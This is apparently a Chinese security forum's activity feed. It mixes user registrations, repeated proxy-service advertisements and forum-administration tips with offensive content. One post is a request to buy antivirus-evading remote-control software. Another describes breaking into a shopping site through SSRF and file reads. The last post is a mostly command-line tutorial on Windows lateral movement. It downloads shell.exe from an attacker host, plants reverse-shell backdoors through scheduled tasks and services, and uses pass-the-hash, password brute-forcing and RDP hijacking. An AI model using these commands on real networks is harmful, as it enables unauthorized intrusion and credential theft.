跳转到帖子

所有动态

此动态墙会自动更新

  1. 一小时前
  2. suibiankankan注册了
  3. 昨天
  4. nesox1988注册了
  5. 前几天
  6. iawnix注册了
  7. ADao2066注册了
  8. youngsir注册了
  9. 之前的
  10. mmjjii注册了
  11. Smart proxy 是一个为用户提供全球海外代理IP的平台,全球数万家企业依托于Smart proxy 提供的解决方案并以此进行数据研究,是世界500强公司使用的代理网络和数据收集平台 Smart proxy的产品优势: 1、覆盖全球的代理网络 Smart proxy与全球多个国家的网络运营商合作,拥有9600万代理池遍布全球超过220个国家地区,我们的代理网络由纯净高质量的家庭住宅代理IP和数据中心代理IP组成。 2、安全可靠的产品服务 无限并发会话,不限带宽城市级定位IP,自定义时效纯净IP资源,99.9%成功运行,专业团队支持,24H监控系统,支持HTTP/HTTPS/SOCKS5协议 Smart proxy的业务应用场景: 品牌保护/竞争对手情报/广告验证/抓取和索引/网站测试/邮件保护/股市数据/SEO监控优化/市场调查/旅游信息聚合 全球海外真实家庭住宅IP 国内最大的IP供应商 覆盖200+国家与地区 全球9000多万住宅IP资源 美国日活跃250w+,英国日活跃60w+(ip更新频率15%) IP池子全球前三,国内第一 质量好,纯净度高,没有并发、带宽限制,支持免费测试!!! Smart Proxy中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l,注册即领取0.5G动态住宅IP流量!
  12. Anya注册了
  13. 大家好。求购一款可以免杀的pc 远控,可以看到对方的电脑屏幕
  14. textile430注册了
  15. Smart Proxy —— 全球领先的代理IP与数据解决方案平台 服务全球数万家企业,赋能数据驱动型决策 作为世界500强企业信赖的代理网络服务商,Smart Proxy 专注于为全球客户提供安全、稳定、高效的海外代理IP解决方案,助力企业突破数据壁垒,精准触达目标市场。 核心优势:技术领先,服务无忧 全球最大IP资源库,精准覆盖 9600万+ 纯净IP池:覆盖 220+ 国家及地区,提供住宅代理与数据中心代理双模式。 高活跃动态IP:美国日活跃IP超 250万,英国超 60万(日更新率 15%),确保IP高可用性。 城市级精准定位:支持按需选择IP地理位置,满足精细化业务需求。 企业级稳定与安全 99.9% 可用性:24小时智能监控系统,专业团队实时响应。 无限制并发与带宽:支持HTTP/HTTPS/SOCKS5协议,适配高并发场景。 纯净IP资源:严格过滤黑名单IP,保障数据采集合法性。 灵活适配全场景 品牌保护 | 竞品分析 | 广告验证 | SEO监控 市场调研 | 舆情监控 | 旅游数据聚合 | 金融数据采集 支持API集成,轻松对接企业系统。 为什么选择Smart Proxy? ✅ 国内市场份额第一,全球代理池规模前三 ✅ 唯一承诺:纯净IP + 无并发/带宽限制 ✅ 免费测试体验,零风险验证效果 限时福利:访问官网注册,即赠 0.5G动态住宅IP流量! 中国官网: Smart proxy中国官网 V X : Renxiaobo____ 立即行动,开启高效数据之旅!
  16. 你是否在尋找一款穩定、高效的IP代理工具,助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理? Smart Proxy 為你提供大量高匿IP資源,全球覆蓋,安全穩定,滿足各類業務需求! 為什麼選擇Smart proxies? 海量IP池-覆蓋全球200+國家地區,輕鬆切換不同地區IP; 高匿穩定-HTTP、HTTPS、SOCKS5協定支持,高匿名度,安全穩定; 高速連線-優質線路,低延遲,確保流暢體驗; 性價比高-彈性套餐,隨選購買,低成本高收益; 便利操作-API呼叫支持,一鍵切換IP,適用於各種應用場景。 適用場景: 爬蟲資料收集,突破反爬限制 跨境電商,防關聯操作 遊戲加速,暢玩全球服 社媒行銷,多帳號管理 限時優惠活動 現在註冊 Smart proxies,新用戶可享專屬折扣,更有免費流量等你體驗! 官網位址: SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位;聯絡专属客戶經理: 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
  17. 你是否在尋找一款穩定、高效的IP代理工具,助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理? Smart Proxy 為你提供大量高匿IP資源,全球覆蓋,安全穩定,滿足各類業務需求! 為什麼選擇Smart proxies? 海量IP池-覆蓋全球200+國家地區,輕鬆切換不同地區IP; 高匿穩定-HTTP、HTTPS、SOCKS5協定支持,高匿名度,安全穩定; 高速連線-優質線路,低延遲,確保流暢體驗; 性價比高-彈性套餐,隨選購買,低成本高收益; 便利操作-API呼叫支持,一鍵切換IP,適用於各種應用場景。 適用場景: 爬蟲資料收集,突破反爬限制 跨境電商,防關聯操作 遊戲加速,暢玩全球服 社媒行銷,多帳號管理 限時優惠活動 現在註冊 Smart proxies,新用戶可享專屬折扣,更有免費流量等你體驗! 官網位址: SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位;聯絡专属客戶經理: 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
  18. 你是否在尋找一款穩定、高效的IP代理工具,助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理? Smart Proxy 為你提供大量高匿IP資源,全球覆蓋,安全穩定,滿足各類業務需求! 為什麼選擇Smart proxies? 海量IP池-覆蓋全球200+國家地區,輕鬆切換不同地區IP; 高匿穩定-HTTP、HTTPS、SOCKS5協定支持,高匿名度,安全穩定; 高速連線-優質線路,低延遲,確保流暢體驗; 性價比高-彈性套餐,隨選購買,低成本高收益; 便利操作-API呼叫支持,一鍵切換IP,適用於各種應用場景。 適用場景: 爬蟲資料收集,突破反爬限制 跨境電商,防關聯操作 遊戲加速,暢玩全球服 社媒行銷,多帳號管理 限時優惠活動 現在註冊 Smart proxies,新用戶可享專屬折扣,更有免費流量等你體驗! 官網位址: SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位;聯絡专属客戶經理: 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
  19. /www/wwwroot/网站根目录/static/templates/core_front_global.php line 7106: 自己的网站名称 若是5.0.4以后的版本,在这个位置; <a title="Sitemap" href="https://自己网站域名/sitemap.php">SiteMap</a><a rel="nofollow" title="hackhat.oorg" href="自己网站域名"><span translate="no">自己网站域名</span> © 2025 All rights reserved.</a>
  20. 升级提示模版过期。 访问/admin/upgrade 进入升级页面, 即可进入升级。 升级过程中出错?
  21. 以下是头衔的规则: | 头衔名称 | 级别范围 | 描述 | 简体中文 | 繁体中文 | 英文 |:-------------------|:-------------|:-------------------------------------------------------------------------|:-------------------|:-------------------|:-----------------------------| | 初窥门径者 | 1 | 初入网络安全领域,对基本知识有所了解,如同初入江湖的学徒。 | 初窥门径者 | 初窺門徑者 | Novice Explorer | | 初出茅庐者 | 2 | 开始接触简单的安全工具和技术,能够完成基础任务,如江湖中的新手侠客。 | 初出茅庐者 | 初出茅廬者 | Beginner Prodigy | | 初露锋芒者 | 3 | 掌握了一些基础技能,能够独立解决简单问题,展现出一定的潜力。 | 初露锋芒者 | 初露鋒芒者 | Emerging Talent | | 江湖新秀 | 4 | 在网络安全领域崭露头角,能够独立完成一些基础的安全测试,如同江湖中的新晋侠客。 | 江湖新秀 | 江湖新秀 | Rising Star | | 侠客行者 | 5 | 技能逐渐熟练,能够应对一些常见的安全挑战,以侠义之心守护网络安全。 | 侠客行者 | 俠客行者 | Wandering Swordsman | | 青出于蓝者 | 6 | 技术能力超越了基础阶段,开始向更高级的领域探索,展现出超越前辈的潜力。 | 青出于蓝者 | 青出於藍者 | Blue-Collar Expert | | 江湖侠名者 | 7 | 在网络安全领域小有名气,能够独立发现和修复一些常见漏洞,技术逐渐成熟。 | 江湖侠名者 | 江湖俠名者 | Renowned Swordsman | | 剑指苍穹者 | 8 | 技术能力大幅提升,能够应对复杂的网络安全问题,如同剑指长空的侠客。 | 剑指苍穹者 | 劍指蒼穹者 | Sky-Piercing Swordsman | | 名动江湖者 | 9 | 技术和经验都达到了较高水平,能够在网络安全领域独当一面,声名远播。 | 名动江湖者 | 名動江湖者 | Legend in the Making | | 江湖高手 | 10 | 技术精湛,能够应对各种复杂的安全挑战,是网络安全领域的高手。 | 江湖高手 | 江湖高手 | Master Swordsman | | 剑宗宗师 | 11 | 在网络安全技术上达到巅峰,能够开发高级工具和策略,如同武侠中的剑术宗师。 | 剑宗宗师 | 劍宗宗師 | Grandmaster of Swords | | 侠之大者 | 12 | 不仅技术高超,还能够为网络安全行业做出贡献,以侠义之心守护网络江湖。 | 侠之大者 | 俠之大者 | Great Hero | | 江湖传奇 | 13 | 在网络安全领域达到了传奇级别,技术无人能及,是行业的标杆。 | 江湖传奇 | 江湖傳奇 | Legendary Figure | | 侠隐山林者 | 14 | 达到最高境界,技术超凡入圣,但淡泊名利,隐于江湖,只在关键时刻出手。 | 侠隐山林者 | 俠隱山林者 | Hidden Hero | 以下是徽章体系: | 头衔名称 | 描述 | 象征 | 英文 | |:-------------------|:-------------------------------------------------------------------------|:-------------------------------------------------------------------------|:-----------------------------| | 云游弟子 | 初入江湖,云游四方,探索未知。 | 初入论坛,开始探索的旅程。 | Yunyou Disciple | | 书生初试 | 初露锋芒,初试牛刀,展现才华。 | 开始在论坛发表见解,初显才华。 | Shusheng Novice | | 童生 | 初入学门,童生试笔,开启修行之路。 | 对论坛规则和文化有一定了解。 | Tongsheng | | 秀才 | 学有所成,初入文坛,才华初显。 | 在论坛中表现出一定的知识和见解。 | Xiucai | | 举人 | 科举成名,举人及第,小有名气。 | 在论坛中开始有影响力。 | Juren | | 进士 | 金榜题名,进士及第,功成名就。 | 在论坛中表现出色,受到认可。 | Jinshi | | 翰林 | 文采飞扬,翰林学士,才华横溢。 | 在论坛中以知识和才华著称。 | Hanlin | | 侠客 | 仗剑天涯,行侠仗义,侠义之心。 | 积极参与论坛,帮助他人。 | Xiake | | 剑客 | 剑术高超,剑指苍穹,技艺超群。 | 在论坛中展现出高超的技能或知识。 | Jianke | | 名士 | 名动江湖,风流倜傥,声名远播。 | 在论坛中具有较高的知名度和影响力。 | Mingshi | | 高士 | 高风亮节,德才兼备,受人敬仰。 | 在论坛中以高尚的品德和才华著称。 | Gaoshi | | 宗师 | 一代宗师,技艺超凡,独步天下。 | 在论坛中达到顶尖水平,受人尊敬。 | Zongshi | | 仙人 | 仙风道骨,超凡脱俗,如入仙境。 | 在论坛中具有传奇般的地位。 | Xianren | | 仙侠 | 仙侠之姿,行云流水,如诗如画。 | 在论坛中达到极高的艺术和智慧境界。 | Xianxia | | 仙宗 | 仙宗之尊,超凡入圣,仙道巅峰。 | 在论坛中达到最高境界,无人能及。 | Xianzong | | 仙尊 | 仙尊之位,道法自然,天下无双。 | 在论坛中达到传奇级别,是论坛的传奇人物。 | Xianzun | --- 晋升规则:
  22. 依照这样设置即可,对套上CDN的用户来说,是非常明智的选择。
  23. 很不错,有问题可以在下面评论。
  24. 像是IPS論壇的 locale 是依賴 Linux 本身的中文包,才會顯示地區、國家、國旗 查看是否存在 zh_CN.utf8 locale -a |grep CN locale -a |grep TW locale -a |grep HK locale -a |grep SG 如果有安裝,則顯示 zh_CN zh_CN.utf8 zh_TW zh_TW.utf8 如果沒顯示,就需要安裝中文包 sudo apt-get install locales dpkg-reconfigure locales 進入 Configuring locales 畫面,敲空白鍵,點選 在 Locales to be generated 選擇以下語言 zh_CN.UTF-8 zh_HK.UTF-8 zh_SG.UTF-8 zh_TW.UTF-8 最後按TAB鍵,移動到OK鍵,再按Enter鍵 (第1次) 接著是在 Default locale for the system environment 指定你預設要用的 中文.UTF-8 最後按TAB鍵,移動到OK鍵,再按Enter鍵 (第2次) (空格键是选定,TAB键是移动选项,这样说就容易理解了,选定完成之后按TAB移动到OK 回车即可。) 如果你在SSH輸入中文,會發現中文變為亂碼,這時就需要在 (第2次) 指定你預設要用的 中文.UTF-8 之後,你將發現Debian操作介面也變為中文的 (雖然中文介面選項很少很少) 最后,重启复服务器即可看到自己的网站程序可以安装中文语言包啦。
  25. 宝塔面板 -> 单击 你的论坛.com -> 伪静态 -> 0.当前 将以下的伪静态,复制并黏贴 -> 保存 以下是Nginx伪静态规则:location / { try_files $uri $uri/ /index.php; } location ~^(/page/).*(.php)$ { try_files $uri $uri/ /index.php; } location /api/ { if (!-e $request_filename){ rewrite ^/api/(.*)$ /api/index.php; } }Apache伪静态规则:<IfModule mod_rewrite.c> Options -MultiViews RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteRule \.(js|css|jpeg|jpg|gif|png|ico|map|webp)(\?|$) /404error.php [L,NC] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> PS论坛后台 -> 搜索引擎优化 -> 伪静态? -> [v] 是 -> 确认 回论坛前台,网址已经不包括index.php了 如果不喜欢网址后面的标题太长 https://你的网址.com/topic/2-新主题标题/ 改法为 论坛后台 -> 系统 -> 高级配置 -> 友好网址 -> 看到友好网址后面连接 -?? 问号的 -> 编辑 -> 友好网址 -> 只删掉 -{?} 然后按确认,千万别改错了 这种 -?? 要修改的地方很多,并且插件安装越多,也就修改越多 以后再安装什么插件,一样要来此处修改它,别忘了 修改好后的友好网址 清除缓存 论坛后台 -> 系统 -> 支持 -> 清除缓存 回到论坛前台,原本的情况 https://你的网址.com/topic/2-新主题标题/ 已更改为 https://你的网址.com/topic/2/
  26. 运行更新列表并安装。sudo apt-get update sudo apt-get upgrade 使用root或sudo权限命令用户身份执行安装openJDK: sudo apt install default-jdk 验证是不是已经安装: java -version 若是已安装则显示如下: openjdk version "11.0.6" 2020-01-14OpenJDK Runtime Environment (build 11.0.6+10-post-Debian-1deb10u1)OpenJDK 64-Bit Server VM (build 11.0.6+10-post-Debian-1deb10u1, 混合模式,共享) 安装Elasticsearch在debian存储库中没有es,我们的分区Elasticsearch APT存储库需要安装,使用以下命令进行导入: wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elasticsearch-keyring.gpg 运行成功之后没任何提示,不必在意; 安装前置包: sudo apt-get install apt-transport-https 将ES添加到系统中: echo "deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list 安装ES搜索引擎: sudo apt-get update && sudo apt-get install elasticsearch 安装完成之后启动ES搜索引擎: sudo systemctl enable elasticsearch.service --now 验证ES是否运行命令(需要在管理面板或者主机面板提前开启9200端口,切记指向单独自己的服务器IP访问,不然会出现目录遍历漏洞!!!!) curl -X GET "localhost:9200/" 若是提示命令未找到 请自行安装;命令如下: sudo apt install curl 输出结果如下: { "name" : "debian10.localdomain", "cluster_name" : "elasticsearch", "cluster_uuid" : "yCOOHdvYR8mHRs5mNXQdDQ", "version" : { "number" : "7.17.6", "build_flavor" : "default", "build_type" : "deb", "build_hash" : "aa751e09be0a5072e8570670309b1f12348f023b", "build_date" : "2020-02-29T00:15:25.529771Z", "build_snapshot" : false, "lucene_version" : "8.4.0", "minimum_wire_compatibility_version" : "6.8.0", "minimum_index_compatibility_version" : "6.0.0-beta1" }, "tagline" : "You Know, for Search" } 服务器可能需要点时间才能启动,等待5-10秒即可。 查看ES服务器记录消息命令: sudo journalctl -u elasticsearch 到这里ES已经完全部署在你的服务器, 进入你的网站后台对接ES输入本地127.0.01 和 端口号 9200 即可使用。 重要信息:因为我经常使用的程序都需要ES支持搜索,针对2h2g 或者2h4g的服务器,安装完成ES之后,会出现运行内存运行百分之百或者百分之七十以上,那么这个问题是怎么造成的呢? 这是因为Java分配的内存太多了。下面我以宝塔面板举例,找到ES的文件目录,把#号去掉,改成我这样就可以了,通常使用 -Xms256m,已经够用了,改完别忘记重启服务器: 到这里ES的安装就结束了,有什么不懂的可以在下面问。 本文编写不易,转载请标明出处,不然就dd你。
  27. 这次的目标是个购物站点,希望发现更多的漏洞,最好是能拿到shell。 一些常见的漏洞都存在,比如任意修改他人密码、修改商品金额等逻辑漏洞都是存在的。但这里就不提这些逻辑漏洞了,这里说一说ssrf。 注册会员后,前台很多上传点,但是均无法上传shell。 通过nmap扫描端口发现对外开放了3306端口,也就是mysql数据库端口。 然后在一处下载文件的地方,看到了个可疑的url。 通过dnslog测试,发现是个ssrf漏洞。 尝试访问百度,得到出是完全回显的ssrf漏洞。 尝试这个ssrf是否支持其他协议,发现支持file协议,完全回显,又可以读文件,真舒服。 那么现在只需要让网站报错 爆出绝对路径,或者尝试去读取一些配置文件看看能否找到网站的绝对路径,最终读取到网站数据库的配置文件,那么就可以连接上数据库就可以拿到管理员账号密码了。 读取到 /etc/httpd/conf/httpd.conf 这个文件,发现网站路径为 /var/www/html 。 于是准备尝试去读取index.php发现居然没有内容,最后各种测试,各种组合,都没任何关于网站的回显,自闭了。 没办法,那就只有想办法让网站报错,看看路径对不对。 终于找到了个点让网站报错,发现之前的路径不对。 最终经过翻代码,找到了数据库配置文件,成功的找到了数据库账号密码。 成功连上了数据库。 最终成功进了后台。 后台还有个这个功能…… 嗯…… 非常好 over…… Uploading Attachment...
  28. 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 横向移动中的文件传输通过文件共享-IPC执行net share命令,可以获得Windows默认开启的网络共享,其中C$为C盘共享,ADMIN$为系统目录共享,还有一个IPC$共享。 IPC(Internet Process Connection)是共享”命令管道”的资源,为了让进程间通信而开放的命令管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 实战中往往会建立IPC$连接,因为通过IPC$连接,不仅可以进行所有文件共享操作,还可以实现其他远程管理操作,如列出远程主机进程、在远程主机上创建计划任务或服务等。 建立IPC$连接需要具备以下两个条件: ①远程主机开启了IPC连接 ②远程主机的139端口和445端口开放 # IPC$ 连接 net use \\192.168.1.131\ipc$ # 建立空连接 net use \\192.168.1.131\ipc$ "password" /user:"Administrator" # 建立非空连接 # IPC$ 使用 net use # 查看本机建立的连接(本机连接其他机器) net session # 查看本机建立的连接(其他机器连接的本机),需要administrator用户执行 net share # 查看本地开启的共享 net share ipc$ # 开启ipc$共享 net share ipc$ /del # 删除ipc$共享 net share admin$ /del # 删除admin$共享 net share c$ /del # 删除C盘共享 net use * /del # 删除所有连接 # IPC$ 连接建立之后的操作 dir \\192.168.1.131\c$ # 列出目标文件目录 copy C:\\Users\Administrator\Desktop\whatever.exe \\192.168.1.131\c$\aaa # 将文件复制到目标C盘aaa目录下 type \\192.168.1.131\c$\1.txt # 查看目标C盘下1.txt文件内容 net use h: \\192.168.52.138\c$ # 磁盘映射,将目标的 C 盘映射到本地的 H 盘 net use h: /del # 删除磁盘映射 建立 IPC 常见的错误代码5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限 51:网络问题,Windows 无法找到网络路径 53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题 67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$ 1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除 1326:账号密码错误 1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况 2242:用户密码过期,目标有账号策略,强制定期更改密码 建立 IPC 失败的原因(1)目标系统不是 NT 或以上的操作系统 (2)对方没有打开 IPC$共享 (3)对方未开启 139、445 端口,或者被防火墙屏蔽 (4)输出命令、账号密码有错误 通过搭建SMB服务器SMB(Server Message Block,服务器消息块),又称CIFS(Common Internet File System,网络文件共享系统),主要功能是使网络上的计算机能够共享计算机文件、打印机、串行端口和通信等资源。SMB消息一般使用NetBIOS协议或TCP发送,分别使用端口139或445,目前倾向于使用445端口。 在linux上,可以通过 https://github.com/fortra/impacket/blob/master/impacket/smbserver.py 来搭建smb服务器。 mkdir /root/smbshare python smbserver.py mysmb /root/smbshare -smb2support 通过Windows自带工具CertutilCertutil 是Windows自带的命令行工具,用于管理Windows证书并作为证书服务器的一部分安装。Certutil提供了从网络下载文件的功能。 certutil -urlcache -split -f http://192.168.1.1:8000/shell.exe c:\users\public\shell.exe //从192.168.1.1:8000下载shell.exe到本地c:\users\public\目录下 BITSAdminBITSAdmin用于创建、下载和上传作业,监视其进度。Windows7及以后的系统自带BitsAdmin工具。 bitsadmin /transfer test http://192.168.1.1:8000/1.txt c:\users\mytools\a.txt // 创建一个名为test的bitsadmin任务,从192.168.1.1:8000下载1.txt,保存为c:\users\mytools\a.txt powershell通过创建WebClient对象来实现文件下载 (New-Object Net.WebClient).DownloadFile("http://192.168.1.1:8000/shell.exe", "c:\users\public\shell.exe") powershell -c "(New-Object Net.WebClient).DownloadFile('http://192.168.1.1:8000/shell.exe','c:\users\public\shell.exe')" at & schtasks & sc横向在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机? 使用 at&schtasks 命令,创建计划任务,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。 获取到某域主机权限->minikatz 得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做密码字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令 利用流程\1. 建立 IPC 链接到目标主机 \2. 拷贝要执行的命令脚本到目标主机 \3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 \4. 删除 IPC 链接 ps: Windows Server 2012 以后的版本没有at命令,只有schtasks命令 at(计划任务)利用过程如下: net time \\192.168.1.131 # 查看时间 at \\192.168.1.131 10:30 cmd.exe /c "whoami > c:\result.txt" # 结果输出到 result 下 type \\192.168.1.131\c$\result.txt # 查看执行结果 at \\192.168.1.131 1 /delete # 删除计划任务,1是任务号 copy hack.bat \\192.168.1.131\c$\Windows\Temp # 上传 bat 脚本 net time \\192.168.1.131 # 查看时间 at \\192.168.1.131 19:48 c:\Windows\Temp\hack.bat # 创建定时任务,执行木马脚本 at \\192.168.1.131 # 查看任务列表 schtasks(计划任务)操作步骤: 利用已建立的IPC连接上传后门程序 利用已建立的IPC连接或指定用户凭据的方式在远程主机上创建计划任务shell schtasks /Create /S 192.168.1.131 /TN Backdoor /SC minute /MO 1 /TR C:\users\pubilc\reverse_tcp.exe /RN System /F # /S 指定要连接的系统; /TN 指定计划任务的名称 # /SC 指定计划任务执行频率; /MO 指定计划任务执行周期 # /TR 指定计划任务执行程序; /RU 指定计划任务运行的用户权限 # /F 如果指定的任务已存在,则强制创建 如果没有建立IPC连接,则需要指定远程主机的用户凭据 schtasks /Create /S 192.168.1.131 /TN Backdoor /SC minute /MO 1 /TR C:\users\pubilc\reverse_tcp.exe /RN System /F /U Administrator /P 123qwe@ 创建完成后,可以等待计划任务自行执行,也可以立即启动计划任务shell schtasks /RUN /S 192.168.1.131 /I /TN Backdoor 查看计划任务shell schtasks /query /S 192.168.1.131 /TN Backdoor 删除计划任务shell schtasks /Delete /S 192.168.1.131 /TN Backdoor /F 也可以通过计划任务执行系统命令,将执行结果写入文件,然后使用type命令查看文件 schtasks /Create /S 192.168.1.131 /TN Backdoor /SC minute /MO 1 /TR "c:\windows\system32\cmd.exe /c 'whoami' > c:\users\public\result.txt" /RN System /F type \\192.168.1.131\C$\users\public\result.txt copy C:\Users\Administrator\Desktop\hack.bat \\192.168.1.131\c$\Windows\Temp schtasks /create /tn hack /tr C:\Windows\Temp\hack.bat /sc ONSTART /s 192.168.1.131 /ru "system" /u administrator /p 123qwe@ schtasks /run /tn hackk /s 192.168.1.131 type \\192.168.1.131\c$\Windows\Temp\result.txt schtasks /delete /s 192.168.1.131 /u administrator /p 123qwe@ /tn hackk /f 注意:在使用schtasks命令时,会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。 UNC路径加载执行Windows系统使用UNC路径来访问网络共享资源,格式为 \\servername\sharename\directory\filename # servername 服务器; sharename 网络共享名字 攻击载荷在远程主机上时,可以直接使用UNC路径代替常规的本地路径,让目标主机直接在测试人员搭建的Smb共享中加载攻击载荷并执行。这样可以省去手动上传载荷的步骤。 例如: schtasks /Create /S 192.168.1.131 /TN Backdoor /SC minute /MO 1 /TR \\192.168.1.1\mysmb\reverse_tcp.exe /RN System /F sc(系统服务)创建远程服务需要拥有两端主机的管理员权限(要创建服务)和IPC连接,具体操作: 利用已建立的共享连接向远程主机上传攻击载荷reverse_tcp.exe 利用已建立的IPC连接在远程主机上创建系统服务shell sc \\192.168.1.131 create Backdoor binpath= "cmd.exe /k c:\users\public\reverse_tcp.exe" # binpath的等号后面需要有一个空格 删除服务shell sc \\192.168.1.131 delete Backdoor 批量利用脚本、工具进行爆破连接#批量检测 IP 对应明文连接 FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应明文 回显版 FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测明文对应 IP 回显版 FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%[email protected] whoami # 批量检测 HASH 对应 IP 回显版 FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./[email protected] whoami 前期除了收集明文密码HASH等,还收集了用户名,用户名配合密码字典,用python打包成.exe可执行文件 pip install pyinstaller pyinstaller -F fuck_neiwang_001.py import os,time ips = { } # net user /domain users = { 'Administrator', '7BOB', 'uf9n1x' 'webserver-2008' } passs = { } for ip in ips: for user in users: for mima in passs: exec = "net use \\" + ip + '\ipc$' + mima + ' /user:god\\' + user print('--->' + exec + '<---') os.system(exec) time.sleep(1) SMB协议利用psexecpsExec是微软官方提供的一个Windows远程控制工具,可以根据凭据在远程系统上执行管理操作,并且可以获得与命令行几乎相同的实时交互性。该工具在MSF框架中也有集成。 psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享 (该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于PsExec是Windows提供的工具,所以杀毒软件将其列在白名单中。 PsExec的基本原理: 通过ipc$连接,释放二进制文件psexecsvc.exe到目标 通过服务管理SCManager远程创建一个psexec服务,并启动服务 客户端连接执行命令,服务端通过服务启动相应的程序执行命令并回显数据 运行结束后删除服务 psexec的使用前提: 对方主机开启了 admin$ 共享,如果关闭了admin$共享,会提示:找不到网络名 对方未开启防火墙或放行445端口 如果是工作组环境,则必须使用administrator用户连接(因为要在目标主机上面创建并启动服务),使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。 如果是域环境,即可用普通域用户连接也可以用域管理员用户连接。连接普通域主机可以用普通域用户,连接域控只能用域管理员账户。 用法: psexec.exe -accepteula \\192.168.1.131 -u Administrator -p 123qwe@ -s cmd.exe # -accepteula 禁止弹出许可证对话框 # -s 以SYSTEM权限启动进程 如果已经建立IPC连接,那么可以直接使用psexec连接远程主机 psexec.exe -accepteula \\192.168.1.131 -s cmd.exe 或者不提取shell,直接用目标系统的cmd.exe的/c选项在目标主机上执行命令,并得到回显(与前面的at命令相似) PsExec.exe \\192.168.1.131 <Command> PsExec.exe \\192.168.1.131 cmd.exe /c "ipconfig" PsExec.exe \\192.168.1.131 -u Administrator -p 123qwe@ cmd.exe /c "ipconfig" smbexec无需先 ipc 链接, 明文或 hash 传递(第三方库) smbexec uf9n1x/administrator:123qwe@@192.168.1.131 smbexec ./administrator:123qwe@@192.168.1.131 smbexec -hashes :$HASH$ ./[email protected] smbbexec -hashes :$HASH$ domain/[email protected] smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] smbexec -hashes :ccef208c6485269c20db2cad21734fe7 uf9n1x/[email protected] 远程桌面调用远程桌面协议(Remote Desktop Protocol,RDP) 查询注册表确定是否主机开启了远程桌面 reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 若字段值为0,则表示已启动RDP;若为1,则表示禁用RDP 开启远程桌面 # 开启远程桌面 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f # 关闭“仅允许运行使用网络级别身份验证的远程桌面的计算机连接”(鉴权) reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 # 设置防火墙策略放行3389端口 netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 对于远程主机,可以通过WMI来开启远程桌面功能 wmic /Node:192.168.1.131 /User:uf9n1x\Administrator /Password:123qwe@ RDTOGGLE WHRER ServerName='win2008' call SetAllowTSConnections 1 RDP HijackWindows系统下,tscon可被用来切换远程桌面的会话。正常情况下,切换会话时需要提供登录密码,但通过特殊的利用方法能够绕过验证,不输入密码实现未授权登录。 可以通过query user来列出所有登录的用户列表,得到id 在SYSTEM权限下,使用tscon <ID>来切换用户不需要验证密码。 sharp RDPhttps://github.com/0xthirteen/SharpRDP sharp rdp可以通过远程桌面协议在远程主机上执行系统命令,且不需要GUI客户端。 工具需要远程主机开启远程桌面功能,且防火墙放行3389端口 WMI的利用WMI(Windows Management Instrumentation,Windows管理规范)时一项核心的Windows管理技术。用户可以通过WMI管理本地和远程主机。 Windows为传输WMI数据提供了两个可用的协议:分布式组件对象模型(Distributed Component Object Model, DCOM)和Windows远程管理(Window Remote Management,WinRM)使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等操作都能远程运行。 在横向移动时,可以利用WMI提供的管理功能,通过以获取的用户凭据,与本地或远程主机进行交互,并控制其执行各种行为。目前两种常见的利用方法: 1、 通过调用WMI的类方法进行远程调用,如Win32_Process类中的Create方法可以在远程主机上创建进程,Win32_Product类的Install方法可以在远程主机上安装恶意的MSI 2、 远程部署WMI事件订阅,在特定事件发生时触发 利用WMI进行横向移动需要具备以下条件: 